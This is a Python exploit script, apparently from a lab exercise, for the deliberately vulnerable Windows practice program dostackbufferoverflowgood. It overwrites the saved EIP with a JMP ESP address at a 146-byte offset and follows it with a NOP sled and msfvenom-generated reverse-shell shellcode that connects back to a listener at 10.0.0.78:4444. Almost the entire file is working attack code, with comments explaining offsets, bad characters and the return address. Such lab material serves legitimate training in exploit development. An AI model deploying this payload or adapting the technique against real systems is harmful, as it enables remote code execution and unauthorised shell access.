DoStackBufferOverflowGood-vanilla-EIP.py
#!/usr/bin/python
# Author : Nu11pwn
# Host system : Ubuntu
# Victim System : Windows 7
# A simple vanilla EIP overwrite for the dostackbufferoverflowgood practice program
# Vulnerable software : https://github.com/justinsteven/dostackbufferoverflowgood
import socket
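# Lab target: a deliberately vulnerable practice binary on a private-range
# host. Only ever point this at systems you are authorized to test.
victim_host = "10.0.0.213"
victim_port = 31337

# msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.78 LPORT=4444 -f c -f python -v shellcode -b "\x00"
# Reverse shell: a listener must already be waiting on 10.0.0.78:4444
# (e.g. `nc -lvnp 4444`) before this script runs, or the call-back is lost.
# NOTE(review): only \x00 was declared a bad char. The request is
# newline-terminated (see build_payload), which suggests the target also
# treats 0x0a as a delimiter -- if the shellcode is ever regenerated, encode
# with -b "\x00\x0a" so a stray 0x0a byte cannot truncate the payload.
# Kept as a bytes literal so the exact 351 encoded bytes go on the wire under
# both Python 2 and 3 (a str with \x escapes would be re-encoded on Python 3).
shellcode = (
    b"\xd9\xc6\xbf\x04\x94\x81\xaa\xd9\x74\x24\xf4\x5b"
    b"\x2b\xc9\xb1\x52\x31\x7b\x17\x03\x7b\x17\x83\xc7"
    b"\x90\x63\x5f\x3b\x70\xe1\xa0\xc3\x81\x86\x29\x26"
    b"\xb0\x86\x4e\x23\xe3\x36\x04\x61\x08\xbc\x48\x91"
    b"\x9b\xb0\x44\x96\x2c\x7e\xb3\x99\xad\xd3\x87\xb8"
    b"\x2d\x2e\xd4\x1a\x0f\xe1\x29\x5b\x48\x1c\xc3\x09"
    b"\x01\x6a\x76\xbd\x26\x26\x4b\x36\x74\xa6\xcb\xab"
    b"\xcd\xc9\xfa\x7a\x45\x90\xdc\x7d\x8a\xa8\x54\x65"
    b"\xcf\x95\x2f\x1e\x3b\x61\xae\xf6\x75\x8a\x1d\x37"
    b"\xba\x79\x5f\x70\x7d\x62\x2a\x88\x7d\x1f\x2d\x4f"
    b"\xff\xfb\xb8\x4b\xa7\x88\x1b\xb7\x59\x5c\xfd\x3c"
    b"\x55\x29\x89\x1a\x7a\xac\x5e\x11\x86\x25\x61\xf5"
    b"\x0e\x7d\x46\xd1\x4b\x25\xe7\x40\x36\x88\x18\x92"
    b"\x99\x75\xbd\xd9\x34\x61\xcc\x80\x50\x46\xfd\x3a"
    b"\xa1\xc0\x76\x49\x93\x4f\x2d\xc5\x9f\x18\xeb\x12"
    b"\xdf\x32\x4b\x8c\x1e\xbd\xac\x85\xe4\xe9\xfc\xbd"
    b"\xcd\x91\x96\x3d\xf1\x47\x38\x6d\x5d\x38\xf9\xdd"
    b"\x1d\xe8\x91\x37\x92\xd7\x82\x38\x78\x70\x28\xc3"
    b"\xeb\x75\xad\xcb\xa5\xe1\xaf\xcb\x28\xae\x26\x2d"
    b"\x20\x5e\x6f\xe6\xdd\xc7\x2a\x7c\x7f\x07\xe1\xf9"
    b"\xbf\x83\x06\xfe\x0e\x64\x62\xec\xe7\x84\x39\x4e"
    b"\xa1\x9b\x97\xe6\x2d\x09\x7c\xf6\x38\x32\x2b\xa1"
    b"\x6d\x84\x22\x27\x80\xbf\x9c\x55\x59\x59\xe6\xdd"
    b"\x86\x9a\xe9\xdc\x4b\xa6\xcd\xce\x95\x27\x4a\xba"
    b"\x49\x7e\x04\x14\x2c\x28\xe6\xce\xe6\x87\xa0\x86"
    b"\x7f\xe4\x72\xd0\x7f\x21\x05\x3c\x31\x9c\x50\x43"
    b"\xfe\x48\x55\x3c\xe2\xe8\x9a\x97\xa6\x19\xd1\xb5"
    b"\x8f\xb1\xbc\x2c\x92\xdf\x3e\x9b\xd1\xd9\xbc\x29"
    b"\xaa\x1d\xdc\x58\xaf\x5a\x5a\xb1\xdd\xf3\x0f\xb5"
    b"\x72\xf3\x05"
)

# Log data, item 4
# Address=080414C3
# Message= 0x080414c3 : jmp esp | {PAGE_EXECUTE_READ} [dostackbufferoverflowgood.exe] ASLR: False, Rebase: False, SafeSEH: True, OS: False, v-1.0- (C:\Users\john\Desktop\dostackbufferoverflowgood.exe)
# 0x080414C3 in little-endian, found with `!mona jmp -r esp`. A fixed address
# is only reliable because the module is neither ASLR'd nor rebased (per the
# mona line above); SafeSEH is irrelevant here since we overwrite the saved
# return address, not an SEH record. Re-derive it for any other build.
jmpesp = b"\xC3\x14\x04\x08"  # !mona jmp -r esp

# Bytes from the start of the overflowed buffer to the saved return address,
# as found with a cyclic pattern for this specific binary.
offset_to_eip = 146
# Small NOP run after the return address so the JMP ESP lands in the
# shellcode even if ESP is a few bytes off at the time of the return.
nop_sled_len = 16


def build_payload(offset=offset_to_eip, ret=jmpesp, sled=nop_sled_len, code=shellcode):
    """Return the newline-terminated exploit buffer as bytes.

    Layout: ``offset`` filler bytes, the little-endian return address
    ``ret`` (lands on the saved EIP), ``sled`` NOP bytes, then ``code``.
    The trailing newline terminates the request; none of the other
    parts may therefore contain 0x0a.

    Args:
        offset: distance in bytes from buffer start to the saved EIP.
        ret: 4-byte little-endian address to overwrite EIP with.
        sled: number of 0x90 bytes placed before the shellcode.
        code: the shellcode bytes.
    """
    return b"".join([b"A" * offset, ret, b"\x90" * sled, code, b"\n"])


def send_exploit(host=victim_host, port=victim_port, payload=None):
    """Connect to ``host``:``port`` and deliver ``payload`` in full.

    ``sendall`` is used instead of ``send`` so a short write cannot
    silently truncate the buffer, and the socket is always closed.
    When ``payload`` is None the default buffer from build_payload()
    is sent.

    Raises:
        socket.error (OSError on Python 3) if the connection or the
        write fails.
    """
    if payload is None:
        payload = build_payload()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((host, port))
        sock.sendall(payload)
    finally:
        sock.close()


if __name__ == "__main__":
    send_exploit()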